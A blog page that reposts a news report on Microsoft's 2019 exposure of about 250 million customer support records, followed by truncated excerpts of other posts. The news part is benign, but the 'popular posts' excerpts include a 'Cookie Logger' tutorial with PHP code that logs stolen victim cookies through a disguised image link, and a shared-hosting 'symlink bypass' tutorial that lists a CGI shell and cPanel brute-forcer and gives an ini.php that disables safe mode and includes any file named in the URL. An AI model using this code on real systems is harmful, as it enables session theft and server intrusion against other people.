Skip to main content

Serious breach at Microsoft Customer Support, 250 Million Records Exposed Online

microsoft tech customer support scams


If you have ever contacted Microsoft for support in the past 14 years, your technical query, along with some personally identifiable information might have been compromised.

Microsoft today admitted a security incident that exposed nearly 250 million "Customer Service and Support" (CSS) records on the Internet due to a misconfigured server containing logs of conversations between its support team and customers.

According to Bob Diachenko, a cybersecurity researcher who spotted the unprotected database and reported to Microsoft, the logs contained records spanning from 2005 right through to December 2019.

In a blog post, Microsoft confirmed that due to misconfigured security rules added to the server in question on December 5, 2019, enabled exposure of the data, which remained the same until engineers remediated the configuration on December 31, 2019

Microsoft also said that the database was redacted using automated tools to remove the personally identifiable information of most customers, except in some scenarios where the information was not the standard format.

"Our investigation confirmed that the vast majority of records were cleared of personal information in accordance with our standard practices," Microsoft said.

However, according to Diachenko, many records in the leaked database contained readable data on customers, including their:

  • email addresses,
  • IP addresses,
  • Locations,
  • Descriptions of CSS claims and cases,
  • Microsoft support agent emails,
  • Case numbers, resolutions, and remarks,
  • Internal notes marked as "confidential."

"This issue was specific to an internal database used for support case analytics and does not represent an exposure of our commercial cloud services," Microsoft said.

By having real sensitive case information and email addresses of affected customers in hand, the leaked data could be abused by tech-support scammers to trick users into paying for non-existent computer problems by impersonating Microsoft support representatives.

"The absence of Personally Identifiable Information in the dump is irrelevant here, given that technical support logs frequently expose VIP clients, their internal systems and network configurations, and even passwords. The data is a gold mine for patient criminals aiming to breach large organizations and governments," COO of ImmuniWeb Ekaterina Khrustaleva told The Hacker News.

"Worse, many large companies and not only Microsoft have lost visibility of their external attack surface, exposing their clients and partners to significant risks. We will likely see a multitude of similar incidents in 2020."

KnowBe4's Data-Driven Defense Evangelist Roger Grimes also shared his comment and experience :

"Having worked for Microsoft for 15 years, 11 years as a full-time employee, I've seen firsthand how much they try to fight scenarios like this. There are multiple layers of controls and education designed to stop it from happening. And it shows you how hard it is to prevent it 100% of the time. Nothing is perfect. Mistakes and leaks happen. Every organization has overly permissive permissions. Every! It's just a matter of if someone outside the organization discovers it or if someone takes advantage of it."

"In this case, as bad as it is, it was discovered by someone who didn't do malicious things with it. Sure, the data, sitting unprotected, could have also been used by the bad guys, but so far, no one has made that case or provided evidence that it has been used maliciously," Grimes added.

"Anyone can have a mistake. The most important question is how the mistake happened and how to prevent it from happening next time, and if any others could have happened from the same set of circumstances."

As a result of this incident, the company said it began notifying impacted customers whose data was present in the exposed Customer Service and Support database.

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h

Cookie Logger

         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo